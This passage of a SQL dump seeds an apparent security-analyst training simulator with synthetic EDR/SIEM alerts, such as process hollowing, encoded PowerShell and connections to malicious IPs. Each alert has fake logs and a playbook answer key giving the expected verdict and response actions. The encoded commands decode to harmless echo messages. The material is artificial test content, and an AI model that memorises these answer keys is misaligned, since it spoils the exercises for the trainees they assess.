Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1720, 'Suspicious Process Hollowing in explorer.exe', 'high', 'SentinelOne', 'Process hollowing technique detected in explorer.exe, indicating potential code injection from an external source.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:15:47Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.12\",\"dst_ip\":\"192.168.1.15\",\"username\":\"alice\",\"hostname\":\"WORKSTATION01\",\"request_body\":\"\",\"command_line\":\"explorer.exe hollowed_process.exe\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for suspicious activity, including process injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"explorer.exe hollowed_process.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Process hollowing technique detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing is a technique often used by malware to hide its execution.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.069Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.12\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe 
hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.069Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.12\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.069Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.12\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.069Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.12\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.069Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.12\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1721, 'Encoded PowerShell Command Detected', 'medium', 'Carbon Black', 'PowerShell executed with an encoded command, potentially indicating an obfuscated script delivery.', 'Malware', 'T1059.001', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:22:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.25\",\"dst_ip\":\"\",\"username\":\"bsmith\",\"hostname\":\"HR-LAPTOP\",\"request_body\":\"\",\"command_line\":\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected laptop\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command execution detected\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands can indicate attempts to execute obfuscated scripts.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.070Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"HR-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand 
ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.070Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"HR-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.070Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"HR-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.070Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"HR-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.070Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"HR-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1722, 'Benign PowerShell Execution Alert', 'low', 'Sysmon', 'Detected a PowerShell command execution on host IT-ADMIN1, appears to be a routine administrative task.', 'Process Execution', 'T1059.001', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:50:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"IT-ADMIN1\",\"request_body\":\"\",\"command_line\":\"powershell.exe -Command Get-ADUser\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of an administrative machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -Command Get-ADUser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"clean\",\"details\":\"Routine administrative PowerShell command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"process_execution\",\"analysis_notes\":\"The command was identified as a standard administrative task, confirming a false positive.\"}', 'Intermediate', 'EDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:50:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"IT-ADMIN1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Get-ADUser\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:50:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"IT-ADMIN1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Get-ADUser\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:50:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"IT-ADMIN1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Get-ADUser\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:50:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"IT-ADMIN1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Get-ADUser\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:50:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"IT-ADMIN1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Get-ADUser\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1723, 'Suspicious Network Connection to Known Malicious IP', 'critical', 'CrowdStrike', 'Detected a network connection from internal host to a known malicious external IP, indicating a potential data exfiltration attempt.', 'Data Exfiltration', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T02:16:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.45\",\"dst_ip\":\"198.51.100.23\",\"username\":\"cjohnson\",\"hostname\":\"ENG-SRV02\",\"request_body\":\"\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for data exfiltration activities\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The connection to a known malicious IP suggests possible data exfiltration.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1724, 'False Positive: Routine PowerShell Script Execution', 'low', 'Carbon Black', 'A PowerShell command was executed on host DEV-WORKSTATION during a routine update process.', 'Process Execution', 'T1059.001', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T07:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.55\",\"dst_ip\":\"\",\"username\":\"david\",\"hostname\":\"DEV-WORKSTATION\",\"request_body\":\"\",\"command_line\":\"powershell.exe -Command Update-Help\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a development workstation\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -Command Update-Help\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"clean\",\"details\":\"Routine PowerShell help update command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"process_execution\",\"analysis_notes\":\"The command corresponds to a standard help update operation, confirming a false positive.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"david\\\",\\\"hostname\\\":\\\"DEV-WORKSTATION\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command 
Update-Help\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"david\\\",\\\"hostname\\\":\\\"DEV-WORKSTATION\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Update-Help\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"david\\\",\\\"hostname\\\":\\\"DEV-WORKSTATION\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Update-Help\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"david\\\",\\\"hostname\\\":\\\"DEV-WORKSTATION\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Update-Help\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"david\\\",\\\"hostname\\\":\\\"DEV-WORKSTATION\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Update-Help\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1725, 'Encoded PowerShell Execution with Suspicious Network Activity', 'high', 'Sysmon', 'Encoded PowerShell command detected with subsequent connection to a suspicious external IP, indicating potential C2 activity.', 'Malware', 'T1090', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:01:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.5.100\",\"dst_ip\":\"203.0.113.99\",\"username\":\"emily\",\"hostname\":\"CORP-LAPTOP\",\"request_body\":\"\",\"command_line\":\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised laptop\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with C2 servers\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command possibly indicating connection to C2\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command followed by network activity to a known malicious IP indicates C2 communication.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:01:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.100\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"emily\\\",\\\"hostname\\\":\\\"CORP-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:01:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.100\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"emily\\\",\\\"hostname\\\":\\\"CORP-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:01:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.100\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"emily\\\",\\\"hostname\\\":\\\"CORP-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:01:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.100\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"emily\\\",\\\"hostname\\\":\\\"CORP-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:01:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.100\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"emily\\\",\\\"hostname\\\":\\\"CORP-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1726, 'Attempted Process Hollowing in explorer.exe', 'high', 'SentinelOne', 'An attempted process hollowing in explorer.exe was detected, which could indicate a potential malware injection.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:20:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.20\",\"dst_ip\":\"\",\"username\":\"fthomas\",\"hostname\":\"SALES-DESKTOP\",\"request_body\":\"\",\"command_line\":\"explorer.exe\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected desktop\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"explorer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected attempt at process hollowing in explorer.exe\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing is a technique used by malware to hide its execution by injecting code into legitimate processes.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 